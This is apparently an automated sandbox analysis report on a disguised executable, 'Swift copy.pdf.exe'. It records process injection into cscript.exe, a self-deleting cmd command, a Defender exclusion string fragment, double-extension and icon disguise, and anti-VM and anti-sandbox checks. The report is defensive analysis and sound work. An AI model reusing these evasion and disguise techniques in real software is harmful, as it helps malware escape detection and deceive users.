          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: Swift copy.pdf.exeVirustotal: Detection: 30%
          Source: Swift copy.pdf.exeReversingLabs: Detection: 20%
          Source: unknownProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe 'C:\Users\user\Desktop\Swift copy.pdf.exe'
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe C:\Users\user\Desktop\Swift copy.pdf.exe
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe C:\Users\user\Desktop\Swift copy.pdf.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Swift copy.pdf.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe C:\Users\user\Desktop\Swift copy.pdf.exe
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe C:\Users\user\Desktop\Swift copy.pdf.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Swift copy.pdf.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Swift copy.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Swift copy.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: Swift copy.pdf.exe, 00000005.00000002.389930422.0000000000FF0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.376832719.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Swift copy.pdf.exe, 00000005.00000002.389961809.0000000001070000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Swift copy.pdf.exe, 00000005.00000002.389961809.0000000001070000.00000040.00000001.sdmp, cscript.exe
          Source: Binary string: cscript.pdb source: Swift copy.pdf.exe, 00000005.00000002.389930422.0000000000FF0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.376832719.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_0258308A push ss; retf
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_02582AC6 push es; ret
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_0040C296 pushfd ; retf
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_004154CC push ss; iretd
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_0040AFE9 push cs; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0498D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0312B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0312B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0312B3FB push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0311C296 pushfd ; retf
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0311AFE9 push cs; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0312B45C push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_031254CC push ss; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.95048824536

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (5001).png
          Uses an obfuscated file name to hide its real file extension (double extension)Show sources
          Source: Possible double extension: pdf.exeStatic PE information: Swift copy.pdf.exe
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Swift copy.pdf.exe PID: 6628, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000031185E4 second address: 00000000031185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 000000000311896E second address: 0000000003118974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe TID: 6632Thread sleep time: -102883s >= -30000s
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe TID: 6652Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2524Thread sleep time: -35000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6780Thread sleep time: -36000s >= -30000s
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeThread delayed: delay time: 102883
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000007.00000000.373852974.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000007.00000000.373819513.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000007.00000000.373679366.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000002.606371070.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000007.00000000.370918951.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: cscript.exe, 0000000A.00000002.591526613.00000000002EC000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000007.00000002.606371070.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000007.00000000.370918951.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000007.00000000.373819513.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000007.00000000.373679366.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000007.00000002.606371070.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000007.00000000.373679366.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000007.00000000.373852974.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000007.00000002.591935318.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000007.00000002.606371070.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_00409B10 LdrLoadDll,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A08CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04950050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04950050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A01074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04932D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04932D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04932D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04932D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04932D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04961DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04961DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04961DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B51BE mov eax, dword ptr fs:[00000030h]
